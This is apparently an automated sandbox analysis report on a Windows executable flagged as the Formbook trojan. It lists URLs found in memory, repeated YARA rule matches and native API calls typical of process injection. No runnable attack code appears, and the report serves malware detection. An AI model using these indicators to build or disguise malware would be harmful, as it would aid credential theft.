            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/blog/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/comments/feed/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/feed/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/kontakt/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/portfolio/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/projekt-details/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/sample-page/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/ueber/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/verkehrswende/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/wp-json/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/xmlrpc.php?rsd
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zijrmf.com/register

            E-Banking Fraud

            Source: Yara match File source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_0042AFB3 NtClose,12_2_0042AFB3
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412B60 NtClose,LdrInitializeThunk,12_2_01412B60
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01412DF0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01412C70
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_014135C0 NtCreateMutant,LdrInitializeThunk,12_2_014135C0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01414340 NtSetContextThread,12_2_01414340
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01414650 NtSuspendThread,12_2_01414650
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412BE0 NtQueryValueKey,12_2_01412BE0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412BF0 NtAllocateVirtualMemory,12_2_01412BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412B80 NtQueryInformationFile,12_2_01412B80
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412BA0 NtEnumerateValueKey,12_2_01412BA0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412AD0 NtReadFile,12_2_01412AD0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412AF0 NtWriteFile,12_2_01412AF0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412AB0 NtWaitForSingleObject,12_2_01412AB0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412D00 NtSetInformationFile,12_2_01412D00
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412D10 NtMapViewOfSection,12_2_01412D10
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412D30 NtUnmapViewOfSection,12_2_01412D30
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412DD0 NtDelayExecution,12_2_01412DD0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412DB0 NtEnumerateKey,12_2_01412DB0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412C60 NtCreateKey,12_2_01412C60
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412C00 NtQueryInformationProcess,12_2_01412C00
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412CC0 NtQueryVirtualMemory,12_2_01412CC0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412CF0 NtOpenProcess,12_2_01412CF0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412CA0 NtQueryInformationToken,12_2_01412CA0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412F60 NtCreateProcessEx,12_2_01412F60
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412F30 NtCreateSection,12_2_01412F30
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412FE0 NtCreateFile,12_2_01412FE0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412F90 NtProtectVirtualMemory,12_2_01412F90
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412FA0 NtQuerySection,12_2_01412FA0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412FB0 NtResumeThread,12_2_01412FB0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412E30 NtWriteVirtualMemory,12_2_01412E30
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412EE0 NtQueueApcThread,12_2_01412EE0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412E80 NtReadVirtualMemory,12_2_01412E80
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01412EA0 NtAdjustPrivilegesToken,12_2_01412EA0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01413010 NtOpenDirectoryObject,12_2_01413010
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01413090 NtSetValueKey,12_2_01413090
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_014139B0 NtGetContextThread,12_2_014139B0
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01413D70 NtOpenThread,12_2_01413D70
            Source: C:\Users\user\Desktop\CFV20240600121.exe Code function: 12_2_01413D10 NtOpenProcessToken,12_2_01413D10
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01491D5A12_2_01491D5A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01497D7312_2_01497D73
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E3D4012_2_013E3D40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FFDC012_2_013FFDC0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01459C3212_2_01459C32
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FCF212_2_0149FCF2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FF0912_2_0149FF09
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E1F9212_2_013E1F92
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A3FD212_2_013A3FD2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A3FD512_2_013A3FD5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FFB112_2_0149FFB1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E9EB012_2_013E9EB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0287DE7413_2_0287DE74
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07230DB013_2_07230DB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723FB7813_2_0723FB78
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072307F113_2_072307F1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072386F813_2_072386F8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072393A013_2_072393A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07238F6813_2_07238F68
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07230DA013_2_07230DA0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07238B3013_2_07238B30
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723ABA813_2_0723ABA8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072319A113_2_072319A1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072319B013_2_072319B0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723080013_2_07230800
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AEB313_2_0729AEB3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299D3F13_2_07299D3F
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294BD813_2_07294BD8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729A2A313_2_0729A2A3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729610013_2_07296100
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729081813_2_07290818
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729707813_2_07297078
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072998C813_2_072998C8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AF0813_2_0729AF08
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07297F6813_2_07297F68
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07297F5813_2_07297F58
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729EFA913_2_0729EFA9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729EFB813_2_0729EFB8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298E2813_2_07298E28
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729968313_2_07299683
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729969013_2_07299690
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AEF813_2_0729AEF8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729940B13_2_0729940B
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729941813_2_07299418
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299CB713_2_07299CB7
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299CCC13_2_07299CCC
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298B0813_2_07298B08
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298B1813_2_07298B18
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294B4813_2_07294B48
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07295BA813_2_07295BA8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294B9B13_2_07294B9B
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729410113_2_07294101
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072991E013_2_072991E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072991D313_2_072991D3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729702D13_2_0729702D
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115010018_2_01150100
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A600018_2_011A6000
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011E02C018_2_011E02C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116053518_2_01160535
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0118475018_2_01184750
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116077018_2_01160770
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115C7C018_2_0115C7C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117C6E018_2_0117C6E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117696218_2_01176962
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011629A018_2_011629A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116284018_2_01162840
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116A84018_2_0116A840
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119889018_2_01198890
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011468B818_2_011468B8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0118E8F018_2_0118E8F0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115EA8018_2_0115EA80
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116AD0018_2_0116AD00
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116ED7A18_2_0116ED7A
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01178DBF18_2_01178DBF
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01168DC018_2_01168DC0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115ADE018_2_0115ADE0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01160C0018_2_01160C00
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01150CF218_2_01150CF2
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01180F3018_2_01180F30
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A2F2818_2_011A2F28
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D4F4018_2_011D4F40
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011DEFA018_2_011DEFA0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01152FC818_2_01152FC8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01160E5918_2_01160E59
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01172E9018_2_01172E90
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0114F17218_2_0114F172
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119516C18_2_0119516C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116B1B018_2_0116B1B0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0114D34C18_2_0114D34C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011633F318_2_011633F3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011652A018_2_011652A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117B2C018_2_0117B2C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117D2F018_2_0117D2F0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115146018_2_01151460
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116349718_2_01163497
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A74E018_2_011A74E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116B73018_2_0116B730
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116995018_2_01169950
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117B95018_2_0117B950
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116599018_2_01165990
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011CD80018_2_011CD800
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011638E018_2_011638E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117FB8018_2_0117FB80
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119DBF918_2_0119DBF9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D5BF018_2_011D5BF0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D3A6C18_2_011D3A6C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01163D4018_2_01163D40
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117FDC018_2_0117FDC0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D9C3218_2_011D9C32
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01179C2018_2_01179C20
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01161F9218_2_01161F92
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01169EB018_2_01169EB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: String function: 011CEA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: String function: 011A7E54 appears 97 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 0145F290 appears 105 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 013CB970 appears 280 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 01427E54 appears 111 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 0144EA12 appears 86 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 01415130 appears 58 times
            Source: CFV20240600121.exe Static PE information: invalid certificate
            Source: CFV20240600121.exe, 00000000.00000002.2103263978.00000000041D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000000.2056245565.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFhmf.exe4 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2086909863.000000000151E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2118386465.0000000007990000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2118490360.00000000079DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2111028089.00000000051D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000014CD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs CFV20240600121.exe
            Source: CFV20240600121.exe Binary or memory string: OriginalFilenameFhmf.exe4 vs CFV20240600121.exe
            Source: CFV20240600121.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
